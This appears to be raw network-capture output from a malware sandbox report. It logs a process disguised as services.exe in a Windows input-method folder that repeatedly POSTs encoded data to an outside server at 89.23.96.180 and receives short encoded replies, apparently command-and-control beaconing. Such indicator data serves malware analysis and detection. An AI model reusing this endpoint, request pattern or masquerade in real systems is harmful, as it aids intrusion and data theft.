                                                              Date: Sat, 21 Dec 2024 09:48:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              45  192.168.2.5  49906  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:28.077169895 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:28.424555063 CET  2536  OUT
                                                              Dec 21, 2024 10:48:29.454899073 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:29.689913034 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              46  192.168.2.5  49911  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:29.931682110 CET  398  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:30.284105062 CET  2536  OUT
                                                              Dec 21, 2024 10:48:31.308461905 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:31.542237043 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:31 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              47  192.168.2.5  49917  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:31.778604031 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:32.127955914 CET | 2536 | OUT | Data Raw: 5d 52 43 57 5d 5e 57 55 55 5e 55 5a 54 5f 50 52 57 5e 5c 5a 52 51 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RCW]^WUU^UZT_PRW^\ZRQQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C.102>)V=1*.Y#3#.;:75Y11*U+7 ?[+>!_.#Q,6
                                                              Dec 21, 2024 10:48:33.167773008 CET | 225 | IN | HTTP/1.1 100 Continue
                                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 32 31 20 44 65 63 20 32 30 32 34 20 30 39 3a 34 38 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Dec 2024 09:48:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.5 | 49923 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:33.403426886 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:33.752819061 CET | 2536 | OUT | Data Raw: 58 56 46 50 5d 5b 57 51 55 5e 55 5a 54 5c 50 56 57 59 5c 5e 52 55 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVFP][WQU^UZT\PVWY\^RUQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .2;1==P>1-\9<$$Y0-)#)1T-?$(?='+5!_.#Q,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.5 | 49926 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:34.701699972 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:35.049635887 CET | 2112 | OUT | Data Raw: 5d 56 43 50 5d 5b 57 52 55 5e 55 5a 54 5e 50 5d 57 5b 5c 5b 52 57 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCP][WRU^UZT^P]W[\[RWQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,!82&>!"9,,''.89S",!Z&T"+?>- Z>!_.#Q,2
                                                              Dec 21, 2024 10:48:36.078263998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:36.314208984 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 57 34 02 3d 55 3f 14 28 01 29 3c 35 0c 2a 00 0b 01 2e 32 28 03 22 12 3a 13 3e 03 2c 06 26 3e 01 5d 23 3a 25 11 20 3f 37 58 3e 31 2e 58 01 1e 21 44 20 0a 2a 0a 24 3f 33 1e 3e 37 08 5a 3c 2d 31 00 33 06 2f 1b 32 03 20 1b 3d 39 2f 0e 26 3d 29 05 38 2f 01 5b 28 3e 06 13 24 36 2b 51 03 1e 26 5d 26 3c 2f 55 25 0d 21 5a 25 10 2d 16 20 3d 24 0e 29 16 27 1a 34 05 0b 05 2d 29 38 5c 3f 3e 3d 03 2a 06 03 06 24 3c 27 19 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989W4=U?()<5*.2(":>,&>]#:% ?7X>1.X!D *$?3>7Z<-13/2 =9/&=)8/[(>$6+Q&]&</U%!Z%- =$)'4-)8\?>=*$<'1.#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.5 | 49927 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:34.822994947 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:35.174597025 CET | 2536 | OUT | Data Raw: 5d 54 43 5e 5d 5b 52 53 55 5e 55 5a 54 5a 50 57 57 59 5c 5c 52 54 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]TC^][RSU^UZTZPWWY\\RTQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ."?2?"!^-,<'/,;!#=2"U(?.(X=5!_.#Q,"
                                                              Dec 21, 2024 10:48:36.199074984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:36.438060045 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.5 | 49932 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:36.681042910 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:37.033935070 CET | 2536 | OUT | Data Raw: 58 56 43 57 58 5b 57 56 55 5e 55 5a 54 5a 50 5c 57 5f 5c 5f 52 51 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCWX[WVU^UZTZP\W_\_RQQV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:$-%P>5^9?<$#.^5#&6U(#?8>%!_.#Q,"
                                                              Dec 21, 2024 10:48:38.063987017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:38.298237085 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.5 | 49937 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:38.540770054 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:38.893332005 CET | 2532 | OUT | Data Raw: 5d 51 43 55 58 59 57 5f 55 5e 55 5a 54 5b 50 57 57 5c 5c 5d 52 55 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QCUXYW_U^UZT[PWW\\]RUQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.1+1=V=2*-<X3<0V,8W#92T? <)%!_.#Q,.
                                                              Dec 21, 2024 10:48:39.926347017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:40.158488989 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:39 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              53 | 192.168.2.5 | 49943 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:40.402971029 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:40.752748013 CET | 2536 | OUT | Data Raw: 58 54 43 51 5d 5f 52 52 55 5e 55 5a 54 58 50 56 57 52 5c 5c 52 5e 51 58 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCQ]_RRU^UZTXPVWR\\R^QX_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -! $==V?!_-/X$? .)7/!]&"6*$0>=,Z>5!_.#Q,*
                                                              Dec 21, 2024 10:48:41.782668114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:42.013999939 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              54 | 192.168.2.5 | 49949 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:41.440223932 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:41.799827099 CET | 2112 | OUT | Data Raw: 5d 55 46 55 58 5c 52 52 55 5e 55 5a 54 5e 50 5c 57 5d 5c 58 52 54 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UFUX\RRU^UZT^P\W]\XRTQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91<1.6)9./$,0W9%V "%*+B8>-'>!_.#Q,2
                                                              Dec 21, 2024 10:48:42.818876982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:43.054467916 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:42 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 53 20 15 26 0d 2b 29 33 13 3e 06 36 1c 29 3d 2a 15 2e 21 30 02 21 3f 3a 5e 3e 03 24 03 33 2e 33 5b 21 5c 2d 11 36 06 2f 5f 3d 21 2e 58 01 1e 22 19 34 0a 3e 0c 27 11 01 52 29 0e 32 5c 2b 10 2a 58 33 01 0e 0e 25 2a 28 1b 28 3a 0d 0f 25 2d 32 58 3b 01 3c 07 28 00 28 1e 24 26 2b 51 03 1e 26 11 26 2c 0d 1f 32 55 39 5e 25 3e 04 06 20 10 27 56 2a 3b 33 51 34 2b 39 04 2d 2a 38 5e 28 5b 39 02 2a 06 25 06 25 2f 28 08 26 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989S &+)3>6)=*.!0!?:^>$3.3[!\-6/_=!.X"4>'R)2\+*X3%*((:%-2X;<(($&+Q&&,2U9^%> 'V*;3Q4+9-*8^([9*%%/(&#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              55 | 192.168.2.5 | 49950 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:42.268290043 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:42.627696991 CET | 2536 | OUT | Data Raw: 58 52 43 51 5d 58 52 52 55 5e 55 5a 54 53 50 57 57 5d 5c 5b 52 52 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRCQ]XRRU^UZTSPWW]\[RRQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .,%=9V)19+$,':#/=['"+$^?8)%!_.#Q,
                                                              Dec 21, 2024 10:48:43.647444963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:43.882312059 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:43 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              56 | 192.168.2.5 | 49956 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:44.118333101 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:44.471466064 CET | 2536 | OUT | Data Raw: 58 56 43 5e 5d 5c 57 5e 55 5e 55 5a 54 5e 50 50 57 59 5c 55 52 5f 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVC^]\W^U^UZT^PPWY\UR_Q__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .W'&>">6-/0?/-%S >%"+;?> [+5!_.#Q,2
                                                              Dec 21, 2024 10:48:45.493215084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:45.726149082 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:45 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              57 | 192.168.2.5 | 49962 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:45.961669922 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
